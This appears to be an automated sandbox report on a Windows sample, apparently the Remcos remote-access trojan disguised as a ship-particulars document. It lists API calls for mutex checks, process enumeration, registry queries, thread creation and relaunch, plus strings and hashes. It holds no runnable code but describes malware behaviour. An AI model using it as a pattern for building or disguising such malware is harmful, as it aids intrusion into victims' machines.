                                            • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                            • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                            • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Software\,00000000,0000000E,004108CC,00000000), ref: 004074C1
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0000000E,004108CC,00000000), ref: 004074CE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004108CC,00000000), ref: 004074DE
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074E7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074F0
                                          • OpenMutexA.KERNEL32 ref: 00407506
                                          • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,004108CC,00000000), ref: 00407516
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                            • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                            • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                            • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407E00
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                            • Part of subcall function 00401000: CreateThread.KERNEL32 ref: 004010C0
                                            • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                            • Part of subcall function 00401000: CreateThread.KERNEL32 ref: 004010E5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,004108CC,00000000), ref: 00407527
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407546
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040756B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407573
                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040757D
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407583
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,00000104,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075AD
                                            • Part of subcall function 00408EF1: RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                            • Part of subcall function 00408EF1: RegQueryValueExA.KERNELBASE(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                            • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                            • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075D6
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075DF
                                            • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                                            • Part of subcall function 0040F0B5: IsWow64Process.KERNEL32(00000000,?,?,004075EA), ref: 0040F0CD
                                          • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075FC
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407622
                                          • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407645
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407787
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407799
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077B4
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004077BD
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077D7
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077ED
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407805
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040781D
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040782F
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407841
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407865
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407875
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407666
                                            • Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00405FB0,80000001,00000000), ref: 00408E64
                                            • Part of subcall function 00408E4E: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,004157E8,?,00405FB0,80000001,00000000), ref: 00408E79
                                            • Part of subcall function 00408E4E: RegCloseKey.ADVAPI32(00000000,?,00405FB0,80000001,00000000), ref: 00408E84
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040768E
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076A9
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076B5
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076C6
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076E2
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076FE
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040771A
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407736
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407752
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407768
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407893
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040789B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078A6
                                            • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                            • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                            • Part of subcall function 00402A78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe,?), ref: 00402AF7
                                            • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                            • Part of subcall function 00402A78: ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                            • Part of subcall function 00402A78: exit.MSVCRT ref: 00402B3D
                                            • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                            • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078D3
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004078DC
                                          • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004078E8
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000001), ref: 004078FD
                                            • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                            • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                            • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                          • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00410844), ref: 0040792A
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00407945
                                            • Part of subcall function 00407E0B: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                            • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                            • Part of subcall function 00407E0B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                            • Part of subcall function 00407E0B: Process32First.KERNEL32(?,?), ref: 00407E79
                                            • Part of subcall function 00407E0B: Process32Next.KERNEL32 ref: 00407E88
                                            • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000128), ref: 00407EA8
                                            • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                            • Part of subcall function 00407E0B: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                            • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                            • Part of subcall function 00407E0B: Process32Next.KERNEL32 ref: 00407EFF
                                            • Part of subcall function 00407E0B: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                            • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                            • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407969
                                          • atoi.MSVCRT ref: 00407970
                                          • CreateThread.KERNEL32 ref: 0040799F
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079AC
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079C0
                                          • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000031,00410668,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079D5
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000011,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079EC
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079FE
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A17
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000031,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A30
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A42
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A5D
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407A66
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407A72
                                          • CreateDirectoryA.KERNEL32(00000000), ref: 00407A79
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415720,004108CC,00000000,00000011), ref: 00407A97
                                          • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000011), ref: 00407AA4
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00407AB0
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AB9
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AC2
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AE0
                                          • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AFB
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B16
                                          • CreateThread.KERNEL32 ref: 00407B2B
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000016,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B38
                                          • CreateThread.KERNEL32 ref: 00407B4E
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000023,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B5B
                                          • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000026,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B71
                                          • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000000,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B83
                                          • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B9E
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407BA7
                                          • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407C44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$?data@?$basic_string@$??1?$basic_string@?c_str@?$basic_string@$V01@@$??0?$basic_string@V01@$??4?$basic_string@$AddressProcV?$basic_string@$CreateD@1@@D@2@@0@Module$Handle$?length@?$basic_string@Thread$??8std@@Hstd@@$?size@?$basic_string@LibraryLoadOpenProcess32$?begin@?$basic_string@?find@?$basic_string@CloseFileMutexNameNextProcessQueryV10@V12@Valuefreemalloc$??2@??9std@@?end@?$basic_string@?substr@?$basic_string@CurrentD@2@@0@0@DirectoryErrorExecuteFirstLastObjectShellSingleSnapshotToolhelp32V10@0@V10@@WaitWow64Y?$basic_string@atoiexit
                                          • String ID: (32 bit)$ (64 bit)$C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$origmsc
                                          • API String ID: 1140220109-2260984107
                                          • Opcode ID: eb0ac9cf140c71ba797a23109526bcb8e61986eda592d9f3486693d77c5661a1
                                          • Instruction ID: 9e524ab3c3c25e5b5afb6edb3c87aefde3ed2a315a96d5f46ca7337cbf0df8a9
                                          • Opcode Fuzzy Hash: eb0ac9cf140c71ba797a23109526bcb8e61986eda592d9f3486693d77c5661a1
                                          • Instruction Fuzzy Hash: 0C227370B05244ABDB0477B1AC5EAEE3B6A9B84305F0044BEF502FA2E1DEBC5D85875D
                                          Uniqueness

                                          Uniqueness Score: -1.00%
